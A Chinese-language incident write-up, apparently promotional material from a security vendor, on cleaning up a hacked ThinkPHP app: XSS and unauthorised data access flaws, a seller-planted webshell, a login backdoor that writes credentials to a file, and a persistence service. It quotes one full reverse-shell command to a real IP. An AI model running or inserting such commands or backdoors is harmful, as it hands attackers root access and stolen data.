相信有很多站長以及運(yùn)營網(wǎng)站或APP的技術(shù)人員都有一些安全上的困擾,尤其是對網(wǎng)站代碼里存在后門文件,以及服務(wù)器被植入木馬病毒的安全問題很鬧心,前段時間我們接到客戶的安全咨詢,說是找的第三方開發(fā)公司做的APP和后臺,運(yùn)營了起來差不多3個月,一開始注冊的會員量不是很多,當(dāng)注冊達(dá)到成千上萬個會員注冊量的時候,就相繼出現(xiàn)了安全上的問題,數(shù)據(jù)庫總是被篡改,會員信息泄露,以及被阿里云提示的云安全中心,安全事件提醒,尊敬的*玉:云盾云安全中心檢測到您的服務(wù)器:47.180.*.*(主服務(wù)器)出現(xiàn)了緊急安全事件:自啟動后門,建議您立即進(jìn)行處理。進(jìn)程異常行為-反彈Shell和異常網(wǎng)絡(luò)連接-反彈shell網(wǎng)絡(luò)外連以及惡意腳本代碼執(zhí)行還有Linux可疑命令序列惡意軟件-后門程序等告警,針對這些安全問題,我們來給大家科普一下,如何去除網(wǎng)站后門木馬以及代碼漏洞檢測等問題。
攻擊情況介紹:
當(dāng)天我們收到客戶的電話咨詢,客戶的平臺、APP和H5端、以及后臺遭到黑客入侵,并篡改了數(shù)據(jù)庫里面的數(shù)據(jù),導(dǎo)致平臺的損失過萬,詳細(xì)詢問了客戶的平臺架構(gòu)以及部署的服務(wù)器數(shù)量,發(fā)現(xiàn)客戶用的是Thinkphp架構(gòu)開發(fā),APP的API接口和H5端以及后臺管理都是在該架構(gòu)的基礎(chǔ)上開發(fā)的,因?yàn)檫@套代碼是客戶從買來后找的第三方公司進(jìn)行的二次開發(fā),第三方開發(fā)公司對里面的代碼后門并不清楚,很多低價賣源碼的,肯定是有利益可圖的。建議大家買來后一定要對網(wǎng)站源碼進(jìn)行代碼安全審計和網(wǎng)站后門審計服務(wù),尤其是對準(zhǔn)備剛上線的APP平臺,對安全問題要重視起來,否則到了后期會員規(guī)模上來后,損失的就不止這一點(diǎn)了。
跟客戶進(jìn)行了詳細(xì)的對接,梳理了所有的服務(wù)器的信息以及網(wǎng)站源碼的位置,我們的SINE安全工程師立即將代碼打包到本地,進(jìn)行源代碼安全審計,通過對用戶注冊以及APP里的具體功能代碼,都進(jìn)行了全面的人工漏洞測試,發(fā)現(xiàn)在留言反饋以及會員信息功能,存在XSS跨站漏洞,這個漏洞可以將XSS攻擊代碼植入到后臺里去,當(dāng)后臺的管理人員查看了反饋的留言或用戶的個人詳情,就會直接觸發(fā)該XSS漏洞,XSS漏洞可以獲取到網(wǎng)站后臺的地址,以及管理員的Session和cookies,有了這2個值,黑客就可以登錄后臺了,對APP里的API接口也進(jìn)行詳細(xì)的安全審計,發(fā)現(xiàn)存在會員信息泄露漏洞,由于未對UID值進(jìn)行當(dāng)前賬號權(quán)限判斷,可以越權(quán)查看其它UID的會員信息,像手機(jī)號以及注冊時間,銀行卡,錢包地址,密碼等等的信息,都可以越權(quán)查看,我們SINE安全工程師對代碼中的一些函數(shù)功能代碼進(jìn)行審計,檢測出了源碼作者留的一句話木馬后門,而且還是加密形式免殺webshell,代碼如下:
真是道高一尺魔高一丈,源碼作者留的后門,手段非常高,一般的建站公司技術(shù)是沒辦法看出這個文件是木馬代碼的,我們對其網(wǎng)站的訪問日志以及APP的接口日志進(jìn)行人工檢查,還發(fā)現(xiàn)了后臺登錄這里被黑客動了手腳,只要管理員登錄成功會立即把用戶名和密碼寫到/data/目錄下的robots.txt文件中,建議大家日后做檢查代碼的時候先搜索下_encode關(guān)鍵詞看看有沒有可疑的,以及搜索關(guān)鍵詞eval函數(shù)的都有哪些再調(diào)用,因?yàn)楹芏嘁痪湓捘抉R都是調(diào)用的eval函數(shù),通過對每個代碼的安全審計發(fā)現(xiàn)上傳功能的代碼中存在上傳后門具體代碼如下:
后門真是太多了,防不勝防,辛虧客戶找到了我們SINE安全對網(wǎng)站代碼進(jìn)行了詳細(xì)的安全審計和漏洞測試,我們對網(wǎng)站的上傳的目錄進(jìn)行了腳本執(zhí)行權(quán)限控制,對eval的后門進(jìn)行了強(qiáng)制刪除,以及對管理后臺登錄這里的后門進(jìn)行了修復(fù),對一些XSS跨站攻擊的代碼進(jìn)行了攻擊防護(hù),對所有g(shù)et post變量提交的參數(shù)進(jìn)行了安全過濾,凡是包含xss跨站代碼的,以及非法植入攻擊代碼的都進(jìn)行了攔截過濾,并對整套代碼進(jìn)行了安全加固與防護(hù),也同時對服務(wù)器進(jìn)行了端口安全策略部署和基礎(chǔ)安全設(shè)置,如注冊表權(quán)限,環(huán)境運(yùn)行賬戶權(quán)限,mysql數(shù)據(jù)庫的權(quán)限分離設(shè)置,以及nginx的運(yùn)行賬戶進(jìn)行了設(shè)置,防止通過網(wǎng)站后門木馬進(jìn)行提權(quán)拿到服務(wù)器權(quán)限,如果想要對網(wǎng)站代碼進(jìn)行后門查找和清除和漏洞人工測試服務(wù)的可以向網(wǎng)站漏洞修復(fù)服務(wù)商SINE安全或鷹盾安全以及啟明星辰,大樹安全等這些服務(wù)商尋求技術(shù)支持。針對阿里云的云安全中心安全事件提醒,我們讓客戶提供了阿里云賬號和密碼,登錄后,對該安全事件的詳情進(jìn)行了查看,發(fā)現(xiàn)確實(shí)是黑客植入了自啟動的后門,我們對Linux系統(tǒng)的自啟動服務(wù)進(jìn)行了查看,發(fā)現(xiàn)黑客植入的木馬病毒,每次重啟服務(wù)器都會自動啟動該服務(wù),向外發(fā)送連接請求,Command: bash -i >& / dev/tcp/1.15.235.160/25670>&1 該命令是直接反彈了Linux root SHELL到1.15.235.160黑客的服務(wù)器。我們對該IP進(jìn)行了阿里云安全組IP限制,以及對系統(tǒng)里的自啟動服務(wù)進(jìn)行了刪除與防篡改部署,至此客戶的APP被黑客攻擊以及篡改數(shù)據(jù)的問題得到了徹底的解決。也希望我們的解決過程分享,能幫到更多的人。
申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!